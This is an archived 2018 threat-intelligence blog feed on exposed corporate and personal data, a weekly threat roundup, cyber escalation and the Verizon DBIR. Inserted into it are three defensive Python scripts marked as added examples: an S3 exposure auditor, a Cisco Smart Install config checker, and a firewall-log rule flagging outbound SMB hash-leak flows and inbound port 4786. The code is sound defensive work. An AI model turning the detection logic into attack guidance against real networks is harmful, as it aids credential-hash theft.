Digital Shadows: Manage Your Digital Risk
Feed updated Wed, 18 Apr 2018 16:08:21 +0000

Out In The Open: Corporate Secrets Exposed Through Misconfigured Services
Wed, 18 Apr 2018 14:31:10 +0000

For organizations dealing with proprietary information or assets, one of the greatest concerns is the threat of competitors getting hold of trade secrets. But what if organizations are already leaving their precious Intellectual Property (IP) publicly exposed, within easy reach of attackers?

Our latest research report, “Too Much Information”, highlights the sheer scale of this occurrence. The reality is that a lot of organizations are giving up this information freely, by unintentionally exposing IP through Amazon S3 buckets, rsync, SMB, FTP, NAS drives, and misconfigured websites.


Would you like any secret source with that?

Among the 1.5 billion files we found exposed through these services were over 95,000 examples of source code information, 900 patent applications, and 69 copyright applications.

Figure 1: Types of publicly-available intellectual property

In one instance, we detected a document containing proprietary source code that was submitted as part of a copyright application (Figure 2). The file included code that outlined the workflow and design of a site providing Electronic Medical Records, all of which was uploaded onto a publicly accessible Amazon S3 bucket.

Figure 2: Introductory page for copyright application containing source code for a company’s app

In another example, we came across an archive of patent summaries for a renewable energy technology company (Figure 3). These documents were marked as “strictly confidential” and contained a copious selection of patent applications complete with detailed labelled diagrams, patent application numbers, filing dates and patent descriptions that discussed the advantages and disadvantages of their product.

Figure 3: Redacted page from patent documents belonging to renewable energy company 


Corporate espionage made easy

Of all the data organizations look to control, IP is among the most precious. Loss of IP can have a number of considerable impacts:

  • Financial loss. There are obvious economic consequences to losing your most sensitive IP. First there are the actual costs associated with dealing with the security incident: resources will have to be assigned to investigating how the exposure occurred, improving security measures, and handling the PR response. Perhaps more damagingly, the release of product information ahead of schedule can seriously damage an organization’s financial performance. For technology companies, the source code your developers have spent months putting together could suddenly be released by malicious actors ahead of schedule, seriously dampening your sales prospects. For some companies, this could put their future in grave jeopardy.
  • Competitive de-positioning. Imagine a pharmaceutical company that has spent years researching a new drug; all that time and financial input would go to waste if a competitor on the other side of the world now had all the information needed to put that drug into production. Proprietary code, patent applications and copyright information would give your closest business rivals some very timely and useful competitive intelligence.
  • Reputational damage. Loss of IP might cost you customers and contracts, credit ratings, stock market value or brand reputation. No organization wants to be known as a company that can’t keep its own source code under wraps. If companies can’t be trusted to protect their most prized assets, then customers will likely assume that their overall approach to data protection, including protecting personal data, is also lacking.
  • National security risk. Certain industries such as defense, manufacturing and national infrastructure worry about being caught in the midst of great power struggles between states. Nation state or state-affiliated actors conduct espionage campaigns to steal information that can improve a country’s military, market or export trade position. The stakes for properly securing sensitive assets are therefore far higher in certain industries, and extend beyond the immediate concerns of the particular organization involved.


While organizations may worry about corporate espionage conducted through insiders, network intrusions and phishing campaigns, these findings demonstrate that there is already a large amount of sensitive data publicly available. Talk about making the competition’s job even easier.

To learn more about the other types of sensitive data that these services are exposing, download a copy of our report.


Want more Digital Shadows research? Subscribe to our threat intelligence emails here.

When There’s No Need to Hack: Exposed Personal Information
Tue, 17 Apr 2018 14:57:11 +0000

With Equifax’s breach of 145 million records still fresh in everyone’s memory and the recent Facebook data privacy controversy, protecting personal data has become part of the political, economic and cultural zeitgeist. Debates over how data can be misused are now commonplace, and newsfeeds are awash with stories of “yet another breach of personal information”. There’s a reason for this; data is a valuable commodity, and there’s a lot of money to be made from trading personal information or using it for fraud. Cybercriminals are therefore continuing to launch phishing campaigns and network intrusions designed to collect personal data.

However, our latest research report, “Too Much Information”, highlights that there is a large amount of personal data already exposed that puts your employees and customers at risk. This data is unintentionally made public through misconfigured Amazon S3 buckets, rsync, SMB, FTP, NAS drives, and misconfigured websites. Let’s focus on a few examples that illustrate the extent of this exposure.
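Both this post and the preceding one attribute much of the exposure to misconfigured Amazon S3 buckets. The audit below is an added example (not Digital Shadows’ research tooling) showing how a defender can check a bucket’s own policy and ACL for the grants that make it world-readable: an Allow statement whose Principal is `*`, or an ACL grant to the AllUsers / AuthenticatedUsers groups. It works on the JSON shapes the S3 GetBucketPolicy and GetBucketAcl APIs return, but the documents embedded here are constructed samples; the bucket name, account id and CIDR are placeholders.

```python
"""Audit an S3 bucket's policy and ACL for grants that make it public.

Added example, not Digital Shadows' tooling. The policy and ACL documents
below are constructed samples in the AWS JSON shapes; the bucket name,
account id and source CIDR are placeholders.
"""
import json

# ACL grantee URIs meaning "anyone on the internet" (AllUsers) or "any AWS
# account holder" (AuthenticatedUsers). Both are effectively public.
PUBLIC_GRANTEE_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}


def _as_list(value):
    """Policy fields may be a single string or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _principal_is_public(principal):
    """True when a statement's Principal matches every caller ('*')."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def public_policy_statements(policy_document):
    """Return (Sid, severity, sorted actions) for Allow statements open to '*'.

    An unconditional '*' principal is reported as "public"; one that carries a
    Condition (e.g. a source-IP restriction) is reported as
    "public-with-condition" so a reviewer still looks at it.
    """
    policy = (json.loads(policy_document)
              if isinstance(policy_document, str) else policy_document)
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if not _principal_is_public(stmt.get("Principal")):
            continue
        severity = "public-with-condition" if "Condition" in stmt else "public"
        findings.append((stmt.get("Sid", "<no sid>"), severity,
                         sorted(_as_list(stmt.get("Action", [])))))
    return findings


def public_acl_grants(acl_document):
    """Return (grantee URI, permission) for ACL grants to the public groups."""
    return [
        (grant["Grantee"]["URI"], grant.get("Permission"))
        for grant in acl_document.get("Grants", [])
        if grant.get("Grantee", {}).get("URI") in PUBLIC_GRANTEE_URIS
    ]


def bucket_is_public(policy_document, acl_document):
    """True if either the policy or the ACL lets anonymous callers in."""
    unconditional = [f for f in public_policy_statements(policy_document)
                     if f[1] == "public"]
    return bool(unconditional) or bool(public_acl_grants(acl_document))


# Constructed sample policy: one world-readable statement, one scoped to an
# account, one open to '*' but restricted by source IP.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::example-backups/*"},
        {"Sid": "AccountOnly", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111111111111:root"},
         "Action": ["s3:GetObject", "s3:PutObject"],
         "Resource": "arn:aws:s3:::example-backups/*"},
        {"Sid": "CorpNetworkList", "Effect": "Allow",
         "Principal": {"AWS": "*"}, "Action": "s3:ListBucket",
         "Resource": "arn:aws:s3:::example-backups",
         "Condition": {"IpAddress": {"aws:SourceIp": "203.0.113.0/24"}}},
    ],
}

# Constructed sample ACL: the owner has full control and AllUsers has been
# granted READ, the classic "public bucket" misconfiguration.
SAMPLE_ACL = {
    "Owner": {"ID": "EXAMPLE_OWNER_CANONICAL_ID"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "EXAMPLE_OWNER_CANONICAL_ID"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group",
                     "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}

if __name__ == "__main__":
    for sid, severity, actions in public_policy_statements(SAMPLE_POLICY):
        print(f"policy statement {sid}: {severity} -> {', '.join(actions)}")
    for uri, perm in public_acl_grants(SAMPLE_ACL):
        print(f"ACL grant: {uri} has {perm}")
    print("bucket is public:", bucket_is_public(SAMPLE_POLICY, SAMPLE_ACL))
```

The conditional statement is reported separately on purpose: a `*` principal fenced by `aws:SourceIp` is not public, but it is one edited CIDR away from being so, which is why the summary function `bucket_is_public` counts only unconditional grants while the detailed listing still surfaces the conditional one for review.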

Tax Returns

Today is tax deadline day, which means there are still people scrambling to submit their tax returns. This window affords criminals opportunities to commit tax return fraud. As we talked about in a previous blog, “It’s Accrual World: Tax Return Fraud in 2018”, criminals go to great lengths to acquire this information. Spoiler alert: there’s plenty of information already out there.

Figure 1: Types of publicly-available personal information

In fact, the most common employee data found in our research was payroll and tax return files, which accounted for 700,000 and 60,000 files respectively. Looking into many of these examples, it was common for this information to be exposed through a contractor – for instance, a boutique accounting firm that backed up their client information. A redacted exposed pay stub is shown in Figure 2.

Figure 2: A redacted example of an exposed pay stub

Unhealthy Exposure

Aside from financial information, there was also a strong medicinal flavor to the findings. Almost 5000 patient lists were publicly available. Most surprisingly, we found over two million .dcm files (2,205,350) exposed on an open SMB port based in Italy. These Digital Imaging and Communications in Medicine (DICOM) files enable the creation and storage of medical tests, like MRIs, that contain personal health information. That’s an awful lot of files, and it doesn’t get much more personal than that.

Personally Identifiable Information versus Personal Data

Personally Identifiable Information (PII) and Personal Data are two terms that are often used interchangeably. PII is mainly used in the U.S. and is defined by NIST as:

“Any information about an individual maintained by an agency, including (1) any information that can be used to distinguish or trace an individual’s identity, such as name, social security number, date and place of birth, mother’s maiden name, or biometric records; and (2) any other information that is linked or linkable to an individual, such as medical, educational, financial, and employment information.”

Pretty comprehensive, right? Well, not as comprehensive as “personal data”, which broadens the definition to include things like device IDs, IP addresses, and cookies. Personal data is the term used in the General Data Protection Regulation (GDPR), which comes fully into force next month.

Our research found that a significant portion of the exposed data was in the European Union (537,720,919 files). With GDPR firmly on the horizon, organizations must consider how they are protecting employee and consumer information across these services. With employees and contractors often backing up and archiving data on their home networks or using cloud storage solutions, organizations need to ensure they have visibility into all the potential areas their customers’ personal data may be exposed. Out of sight may mean out of mind, but with GDPR coming into force, this could also mean organizations may soon be “out of pocket”.

Figure 3: The top countries making up the 500 million exposed files in the European Union


To learn more about the other types of sensitive data that these services are exposing, download a copy of our report. You can also find out more about the implications of GDPR in our “Path to Compliance” paper.



Shadow Talk Update – 04.16.2018
Mon, 16 Apr 2018 14:32:47 +0000

This week’s Shadow Talk discusses a Cisco Smart Install Client flaw exploited in a disruption attack, an information leak vulnerability discovered in Microsoft Outlook, details on OpIcarus and OpIsrael, the Verizon DBIR, and why you should still be excited about the RSA Conference.


Cisco Smart Install Client enabled mass disruption

Attackers abused a legitimate Cisco Smart Install Client protocol to target Iranian and Russian switches in a disruptive operation. Through defacements left on start-up configuration of affected devices and statements to journalists, the perpetrators claimed to have acted in defense of the integrity of United States elections, although their identity and origin remains unknown. This activity occurred within the context of escalating political tensions between the United States and the impacted nations. The tools needed to identify and exploit the flaw are readily available, potentially allowing exploitation by attackers with even low capabilities. System administrators should disable the Smart Install Client function and limit access to Port 4786/tcp to mitigate exposure.
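The two mitigations named above, disabling the Smart Install client and restricting TCP/4786, can be checked against saved switch configurations rather than by probing the devices. The script below is an added example (not Digital Shadows’ tooling) that audits Cisco IOS running-config text: it treats a top-level `no vstack` line as Smart Install disabled, and otherwise looks for extended ACL entries that mention port 4786 so an administrator can see which switches still rely on nothing but the default. The configs embedded here are constructed samples; hostnames and addresses are placeholders, and treating the absence of `no vstack` as “enabled” is this script’s assumption based on the feature being on by default.

```python
"""Audit saved Cisco IOS running-configs for Smart Install exposure.

Added example, not Digital Shadows' tooling. Checks the two mitigations
discussed above: "no vstack" (Smart Install disabled) and extended ACL
entries restricting TCP/4786. The configs are constructed samples with
placeholder hostnames and addresses. Assumption: a config without
"no vstack" has Smart Install enabled (the feature's default).
"""
import re

SMART_INSTALL_PORT = "4786"

# Top-level "no vstack" disables the Smart Install client on the switch.
NO_VSTACK = re.compile(r"^no vstack\s*$", re.MULTILINE)
# Extended ACL entries naming the Smart Install port, e.g.
#   permit tcp 10.0.0.0 0.0.0.255 any eq 4786
#   deny   tcp any any eq 4786
ACL_4786 = re.compile(r"^\s+(permit|deny)\s+tcp\s+.*\beq\s+" + SMART_INSTALL_PORT + r"\b")


def audit_smart_install(running_config):
    """Return the Smart Install posture of one switch as a dict."""
    m = re.search(r"^hostname\s+(\S+)", running_config, re.MULTILINE)
    hostname = m.group(1) if m else "<unknown>"
    if NO_VSTACK.search(running_config):
        return {"hostname": hostname, "smart_install": "disabled",
                "acl_entries": [], "risk": "low"}
    # Feature still on: see whether an ACL at least fences the port off.
    entries = [" ".join(line.split())          # collapse IOS column padding
               for line in running_config.splitlines() if ACL_4786.match(line)]
    fenced = any(e.startswith("deny") for e in entries)
    return {"hostname": hostname, "smart_install": "enabled",
            "acl_entries": entries, "risk": "medium" if fenced else "high"}


def exposed_hosts(configs):
    """Hostnames whose Smart Install is enabled with no ACL restricting 4786."""
    return sorted(r["hostname"] for r in map(audit_smart_install, configs)
                  if r["risk"] == "high")


# Constructed sample 1: feature disabled outright.
CONFIG_DISABLED = """\
hostname sw-core-01
!
no vstack
!
interface Vlan1
 ip address 10.0.0.2 255.255.255.0
"""

# Constructed sample 2: feature left on, but an ACL limits 4786 to the
# management subnet and drops everything else.
CONFIG_ACL = """\
hostname sw-dist-03
!
ip access-list extended MGMT-IN
 permit tcp 10.0.0.0 0.0.0.255 any eq 4786
 deny   tcp any any eq 4786
 permit ip any any
!
interface Vlan1
 ip address 10.0.0.3 255.255.255.0
 ip access-group MGMT-IN in
"""

# Constructed sample 3: defaults untouched, the case the advisory warns about.
CONFIG_DEFAULT = """\
hostname sw-access-12
!
interface Vlan1
 ip address 10.0.0.12 255.255.255.0
"""

if __name__ == "__main__":
    for cfg in (CONFIG_DISABLED, CONFIG_ACL, CONFIG_DEFAULT):
        print(audit_smart_install(cfg))
    print("needs attention:", exposed_hosts([CONFIG_DISABLED, CONFIG_ACL, CONFIG_DEFAULT]))
```

An ACL is graded “medium” rather than “low” because the port is still open to whatever the permit line admits; the advice above is to disable the client where it is not needed, and the audit reflects that ordering.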

New ATM malware variant discovered

A potentially new variant of automated teller machine (ATM) malware, “ATMJackpot”, was documented by security researchers. Its operators attempt to steal cash from ATMs by connecting to cash dispensers and other peripheral devices via a piece of middleware called eXtension for Financial Services (XFS) Manager. Because the initial infection vector for ATMJackpot is not known, a full assessment of its threat cannot be made at the time of writing. If the malware was installed via network intrusion, that would typically require technical capability and would indicate that the wider attack campaign represents a high level of threat. However, if it was installed via physical access to ATMs, fewer skills would be needed and the financial impact would likely be significantly lower. Given the lack of details, the discovery of ATMJackpot does not necessarily represent a dramatic escalation in threat.


Microsoft Outlook flaw allows theft of password hashes

A Microsoft Outlook flaw enables attackers to abuse the way the software renders email messages containing Object Linking and Embedding (OLE) objects, and gather user password hashes and other sensitive information. A patch has been released for this vulnerability (CVE-2018-0950); without it, if an OLE object is hosted on a remote server and embedded in a message, Outlook initiates a connection via Server Message Block (SMB). The result is unauthorized information disclosure, with greater consequences if the technique is combined with other exploits. Digital Shadows has not seen reports of the vulnerability’s exploitation in the wild, although it would not require a high level of capability. Implementing the patch and blocking inbound/outbound SMB connections to the network perimeter, where possible, can be effective. 
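The perimeter control recommended here, blocking SMB at the network edge, can also be monitored: a workstation reaching out to an external host on TCP/445 or 139 is exactly the flow the OLE rendering issue produces, and the same log source shows whether internet hosts are reaching the Smart Install port on switches from the earlier item. The detector below is an added example (not Digital Shadows’ detection content) that parses a simple key=value firewall log and raises two rules: outbound SMB to a non-internal destination, and inbound TCP/4786 from a non-internal source. The log format, the internal address ranges and every address in the sample are constructed; `parse_line()` is the part to adapt to a real firewall.

```python
"""Flag outbound SMB and inbound Smart Install flows in firewall logs.

Added example, not Digital Shadows' detection content. The key=value log
format, the "internal" ranges and all addresses are constructed; adapt
parse_line() to a real firewall's export format.
"""
import ipaddress

SMB_PORTS = {139, 445}
SMART_INSTALL_PORT = 4786
# What this organisation treats as internal (constructed choice; the
# documentation ranges used in the sample are therefore "external").
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample log lines: benign and suspicious flows mixed.
SAMPLE_LOG = """\
2018-04-12T10:15:03Z fw01 action=allow proto=tcp dir=out src=10.0.5.21 sport=51234 dst=198.51.100.7 dport=445
2018-04-12T10:15:09Z fw01 action=allow proto=tcp dir=out src=10.0.5.21 sport=51240 dst=10.0.9.4 dport=445
2018-04-12T10:16:44Z fw01 action=allow proto=tcp dir=in src=203.0.113.50 sport=40021 dst=10.0.0.2 dport=4786
2018-04-12T10:17:02Z fw01 action=allow proto=tcp dir=out src=10.0.5.30 sport=51301 dst=198.51.100.7 dport=443
2018-04-12T10:18:15Z fw01 action=allow proto=tcp dir=in src=10.0.0.15 sport=38800 dst=10.0.0.2 dport=4786
2018-04-12T10:19:40Z fw01 action=deny proto=tcp dir=out src=10.0.5.22 sport=51410 dst=192.0.2.9 dport=139
"""


def is_internal(ip):
    return any(ip in net for net in INTERNAL_NETS)


def parse_line(line):
    """Parse 'timestamp device k=v k=v ...' into a dict; None for junk lines."""
    parts = line.split()
    if len(parts) < 3:
        return None
    record = {"ts": parts[0], "device": parts[1]}
    for token in parts[2:]:
        if "=" not in token:
            return None
        key, value = token.split("=", 1)
        record[key] = value
    try:
        record["dport"] = int(record["dport"])
        record["src_ip"] = ipaddress.ip_address(record["src"])
        record["dst_ip"] = ipaddress.ip_address(record["dst"])
    except (KeyError, ValueError):
        return None
    return record


def classify(record):
    """Name the rule a parsed flow matches, or None."""
    if record.get("proto") != "tcp":
        return None
    # Outlook/OLE case: an inside host talking SMB to something outside.
    if (record.get("dir") == "out" and record["dport"] in SMB_PORTS
            and not is_internal(record["dst_ip"])):
        return "smb-egress"
    # Smart Install case: an outside host reaching TCP/4786 on a switch.
    if (record.get("dir") == "in" and record["dport"] == SMART_INSTALL_PORT
            and not is_internal(record["src_ip"])):
        return "smart-install-exposure"
    return None


def detect(log_text):
    """Run classify() over each line. Denied flows are still reported,
    flagged as blocked: a blocked SMB egress attempt still names a host
    that tried, which is the lead an analyst wants."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rule = classify(rec)
        if rule:
            alerts.append({"ts": rec["ts"], "rule": rule, "src": rec["src"],
                           "dst": rec["dst"], "dport": rec["dport"],
                           "blocked": rec.get("action") == "deny"})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        state = "BLOCKED" if alert["blocked"] else "ALLOWED"
        print(f'{alert["ts"]} {alert["rule"]:24} {alert["src"]} -> '
              f'{alert["dst"]}:{alert["dport"]} ({state})')
```

The internal/external split is deliberately a configured list rather than a library notion of “private”, since an organisation’s routable management ranges and its cloud prefixes rarely line up with RFC 1918 exactly; SMB to an internal file server stays silent, SMB to anything else is the alert.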


Film service customers victims of payment data breach

On 09 Apr 2018, multiple media outlets reported on an allegedly targeted attack against food-service and facility-management company Sodexo’s cinema voucher program, Filmology. Sodexo stated that credit cards used on its website between 19 Mar 2018 and 03 Apr 2018 may have been compromised, and that it continues to investigate. However, a Filmology representative allegedly claimed that “the hack on the payment page was carried out over 2 months and involved many accounts”. Customers of Sodexo’s Filmology service should monitor for fraudulent charges to their credit cards and consider replacing those used during the date range stated by the company.


Compromised websites delivered NetSupport Manager RAT

On 05 Apr 2018 researchers at security company FireEye reported on a campaign delivering the commercially available “NetSupport Manager” remote-access tool (RAT). Threat actors used compromised websites to prompt visitors to download fake Flash, Chrome and Firefox updates. These were JavaScript files that ultimately fetched the RAT payload from a remote server. Digital Shadows’ research into the IP address used in the campaign demonstrated it has likely been used to distribute malware since at least November 2017. The threat actors have likely had some success, given the duration of activity. Their motive is unknown. Indicators of compromise can be found on the Digital Shadows online portal.


New activity sparked by OpIsrael and OpIcarus

Beginning on 07 Apr 2018 multiple hacktivists tweeted attack claims, as part of OpIsrael, an “Anonymous” collective-affiliated operation in support of Palestine. Attack claims typically included website defacements. However, Twitter user LorianSynaro also claimed to have obtained databases of 83 Israeli universities; a sample uploaded to code-sharing website Hastebin contained no sensitive information and was likely obtained from open sources. More OpIsrael claims are likely in the short-term future (within three months). Moreover, an operational announcement has called for a new phase of the OpIcarus hacktivist campaign in June 2018. The type of activity was not stipulated, but will highly likely include denial of service (DoS) attacks and data breach claims against financial entities. Recent iterations of OpIcarus have attracted scant threat actor involvement; thus, this new phase poses a very low risk at this time.


New botnet scanning activity targeting Brazil

Security company Trend Micro identified and reported on scanning activity targeting vulnerable internet of things devices in Brazil. The scanning originated with several compromised devices in China and mirrored the behavior of previously identified “Mirai” botnets, which used default and weak credentials to hijack devices. Mirai’s source code was publicly released in October 2016, which has enabled numerous threat actors to develop their own botnets of varying size. Targeting weak credentials is a common tactic used to create botnets; users should replace these with complex passwords.

Escalation in Cyberspace: Not as Deniable as We All Seem to Think?
Thu, 12 Apr 2018 15:01:47 +0000

The recent assassination attempt on former Russian spy Sergey Skripal has led to a deluge of cyber-based conspiracy theories within the London security community. My own personal favourites are that (a) Skripal was targeted for assassination due to his alleged engagement with the UK security services over the Democratic National Congress hack in 2017, and (b) that the UK government considered a cyber-attack on Russia in response to the assassination attempt. To date, both these claims remain completely unsubstantiated. However, that so many theories around the Skripal assassination attempt link cyber operations to a conventional covert operation is symptomatic in my mind of how intertwined modern international relations have now become with cyber threats.


Escalation and de-escalation in international relations

International Relations (IR) is a deeply complex field of study that is increasingly integrating cyber security issues into its analysis. One concept within the field of IR that is particularly useful for understanding issues such as the ones generated by the Skripal event is that of escalation in levels of hostilities between states. Escalation occurs between states during or in the run-up to a period of conflict, and a situation can be seen either to be escalating or de-escalating depending on the situation and the wishes of the states involved.

One of the best examples of escalation is the Cuban missile crisis of 1962, when the construction of ballistic missile launch facilities (silos) on the island led the Kennedy administration to impose a military blockade and demand the withdrawal of all weapons from Cuba. Within this case an important point to note is that the processes of escalating and de-escalating involved signalling between the US and Russia. Examples of signalling within the crisis included the building of missile silos (escalation), Kennedy’s address to the US on the 22 October 1962 (escalation), Soviet withdrawal of missiles (de-escalation), and US public commitment to respect Cuban sovereignty (de-escalation). These are all examples of both provocative and palliative signalling between the states.


Figure 1: Cuban Missile Crisis game tree modelling how US and Soviet actors would have considered their decisions (Source: Wikimedia Commons)


Cyber and the “space between”

Cyber operations are often, I believe incorrectly, portrayed as being desirable precisely because they do not cause escalation between states. As Eric Rosenbach, former Assistant Secretary of Defense and principal cyber advisor to the Pentagon from 2011 to 2015, commented:

“The place where I think it will be most helpful to senior policymakers is what I call “the space between.” What is the space between? … You have diplomacy, economic sanctions…and then you have military action. In between there’s this space, right? In cyber, there are a lot of things that you can do in that space between that can help us [the United States] accomplish the national interest.”

The “in between” area referred to by Rosenbach is symptomatic of the sentiment that cyber operations have a high level of plausible deniability and hence do not have the potential to escalate a conflict in the same way a physical operation does.

However, a historical review of major cyber incidents shows this theory to simply not be true. The distributed denial of service (DDoS) attacks on the Estonian economy circa 2007 are still used to frame Russia as a highly aggressive cyber actor, even though the attribution is thin. After the Sony hack of 2014, the US conducted a thinly veiled cyber-attack on the North Korean Internet. One of the legacies of the Stuxnet incident of 2010 was Iran prioritizing the development of its own cyber warfare capability that bore its own bitter fruit in 2012 with an attack on Saudi Aramco.

What all these cases show is that far from being a consequence-free way of striking against an enemy, when attributed to a state (no matter how tenuously) cyber-attacks can lead directly to escalation. Herein lies the issue with cyber conflict: signalling between states in physical space such as the Cuban missile crisis is very clear; however, within cyberspace what is an escalating and de-escalating signal is very difficult to interpret.

Coupled with this is the issue of proportionality and what the cyber equivalent of a minor skirmish versus an all-out assault actually is. Here the potential for unplanned escalation between states rises exponentially. As a recent Chatham House paper commented: “there is a risk that any such [cyber] operation could be construed by the targeted state, or even the international community at large, as a use of force, leading to escalation of the situation”.


To conclude, what we have not seen to date is a “cross over event”, where a physical act of violence has provoked a cyber-attack that has in turn escalated to a retaliatory act of physical violence. Nevertheless, the discussions around events such as the Skripal assassination attempt have put this type of scenario on the agenda. Within this context, the idea that cyber is somehow “the space between”, where action has no consequence, is now simply incorrect.


To learn more, subscribe to our threat intelligence emails here.

Leveraging the 2018 Verizon Data Breach Investigations Report
Tue, 10 Apr 2018 18:24:15 +0000

Today, the 11th edition of the Verizon Data Breach Investigations Report (DBIR) has been released. This year’s report includes 53,308 security incidents, 2,216 data breaches, 65 countries, and 67 contributors.

I participated in a panel discussion with the Verizon team on BrightTALK earlier today. Listen to the recording here.



The DBIR is one of the most anticipated annual reports and has endured for many years. If you’ll indulge me and take a trip down memory lane, here are some of the events you might remember from the year the first DBIR was written:

  • The first Twilight film was released, and the nation was divided by “Team Edward” or “Team Jacob.”
  • The Dark Knight starring Heath Ledger was released. This serves as a painful reminder of just how terrible Ben Affleck’s Batman is.
  • The stock market crashed on September 29, 2008.

Some of the key findings for me:

  • “68% of breaches took months or longer to detect.” In a world of real time this and real time that, I’d be happy to forgo the real time if I get better fidelity alerting. From both my time at Forrester and my time now as CISO, I generally view “real time intelligence” as “real time false positives” that are going to create more work for my security team. If we are looking at “months or longer” for breaches, I’d be happy to wait a few more hours or days to get better quality reporting that doesn’t DoS (denial of service) my team and reduce my overall time to detect.


  • Ransomware is the top flavor of malicious software, found in 39% of cases where malware was identified. You must have a plan for extortion attempts, and not just ransomware, but also DDoS extortion or intellectual property extortion. Your business continuity planning must take these scenarios into account. My colleague Harriet Gruen and FBI Supervisory Special Agent, Sheraun Howard, recently did a webinar on ransomware that you might find useful: “Emerging Ransomware Threats and How to Protect Your Data”.


  • I find the “Denial of Service: Storm preparations” section to be particularly relevant. This was a focus area of mine at Forrester and I also have to deal with this in my day job. DDoS “attacks, on average, are more like a thunderstorm than a Category 5 hurricane”. “You will find that most of the attacks are measured in minutes.” The question for CISOs is how much do I invest in a thunderstorm? Do I have enough budget to prep for a Category 5 hurricane? When it comes to budget tradeoffs these are important questions. Having intelligence on threat actors who conduct these activities against your industry can help with this calculation.


  • JavaScript (.js), Visual Basic Script (.vbs), MS Office and PDF tend to be the file types found in first-stage malware. This isn’t breaking news, but it’s a good reminder to make sure we incorporate this into our vulnerability management triage process. We should be tracking the software, technologies and CVEs that malware is exploiting.


Source: Verizon DBIR

Since we are eleven years into the DBIR, I suspect that you are familiar with how to leverage the report, but just in case you aren’t, here are some quick suggestions:

  • The report is filled with great content, and there is a lot of it. The report is nearly 50 pages without the appendices. I found it useful to read through it once in its entirety before I started making notes. I understood the full context and then I could start breaking it down into “byte-sized” bits.


  • Yesterday was National Unicorn Day, and you may very well be a unicorn. Not everything in the DBIR will apply to your business. Make sure to take this into consideration while reading the report.


  • Go to Figure 28 “Industry Comparison” on page 26, look at your industry and the attack patterns that are most common in the DBIR data set. Do you have the appropriate security controls in place to detect and mitigate these attacks?


Source: Verizon DBIR

  • You can use the attack patterns to build intelligence requirements and to kick start your collection plan. For example, if you are in the banking industry you can build or buy collection capabilities around these areas:
    • Banking Trojans (tools, actors, exploits, configuration files)
    • Denial of service (tools, actors, target selection)


I’ve already read through the DBIR multiple times and with each subsequent reading I find something else that is useful. One final recommendation that I’ve been suggesting for many years is to create your own version of the DBIR based on your own intrusion and breach data. Nothing is more relevant than what is happening within your own organization. The DBIR has some great examples of graphics that you can incorporate into your own tailored reports, which you can then use to communicate the threat landscape to your executives.



Introducing Shadow Search – Quickly enable deeper research and investigation
Tue, 10 Apr 2018 01:35:30 +0000

All enterprises face key challenges in their quest to protect their organization from cyber threats. One challenge I hear consistently from security professionals is the difficulty of keeping up with the volume of alerts generated by their security controls. The problem they face is that each alert needs to be analyzed and understood before a decision is made. To do that, teams are using a range of tools and information like open source feeds, specialist news or blogs, and threat intelligence sources to enrich their understanding of the alert before they can make a decision. This enrichment takes time. Unfortunately, time is perhaps the scarcest commodity for security professionals because there aren’t enough of us, the number of alerts is ever increasing, and the pressure is on because the costs of poor decisions are going up.

Shadow Search, the enhanced search capability we are adding to our SearchLight service, is all about giving a bit of time back to security teams. Our customers were telling us that the insight we provided with our Digital Shadows alerts could be really useful in support of their security operations process for alerts from other sources. When we looked at this, we felt there was an opportunity to add more information sources and scope to make the massive amounts of data from the deep, dark, and open web more accessible and discoverable from the SearchLight portal, better supporting these customers as they make decisions.

So I am excited that we have just launched our new “Shadow Search” capabilities, designed specifically to provide the data that security teams need to make decisions faster. Shadow Search transforms the threat intelligence search function, delivering market leading coverage and user experience. Users now have unrestricted access to a vast and expanding Digital Shadows content repository to investigate and pivot between data sources, threat actor information and incidents.



Shadow Search includes security relevant sources as diverse as criminal forums, reputable security blogs and dark web pages, in addition to Digital Shadows cyber threat intelligence (CTI) and third-party threat intelligence feeds. Organizations can use this practical and actionable information to enhance their understanding of threats, in their business context. Examples of use cases include the ability to:

  • Investigate security incidents – pivot from observed incidents on your network to gain further context about a threat or threat actors
  • Monitor global events and industry trends – access to real-time data and finished threat intelligence allows you to track threats associated with geography, sector or area of interest and stay ahead of the unfolding developments
  • Manage third party risk – identify weaknesses in your supply chain, including if a supplier has been the subject of a breach, or vulnerabilities in your software are being commonly exploited in the wild
  • Research threat information to help prioritize resource usage – detect new activity by tracked threat actors and changes to malware campaigns to support business cases

Analysts can save their searches and return to them or subscribe to receive updates that meet their specific enterprise criteria.

Shadow Search benefits include the following:

  • Immediate access to threat data – Get instant access to raw collection when you need it.
  • Broad coverage – A vast repository of data including curated threat intelligence, content for hard to reach web sources (dark web) and more, including exploits and observables, all in one place opened up for search.
  • Relevant results – Smart filters and powerful search syntax allowing users to focus in on the information that’s most relevant to them.
  • Actionable information – Rich results with associated observables, intuitive interface, and full export enables users to make operational use of the results.

Collaborative development

Having only recently joined Digital Shadows, I got my hands on the capability after it had been extensively trialed by our beta customers; a huge thank you goes to those who collaborated with us on that process. I found the UI intuitive, and the timeline and summary views help put the results in context.

We’ve added features like advanced filtering by source, date range and information type and export capabilities in direct response to the feedback we have had from the beta. See the screen shot above for a view of the Shadow Search interface, but only a hands-on demo really does it justice. It will be at RSA Conference for those who are attending and if you can’t make it, we would be happy to arrange a demo for you.

Our beta clients now tell us it’s easy to investigate an incident and pivot to related research and forums or research threat actors and that the unrestricted access to the original sources and proprietary Digital Shadows cyber threat intelligence (CTI) is very welcome. Most importantly, we are now hearing that it is saving them time.

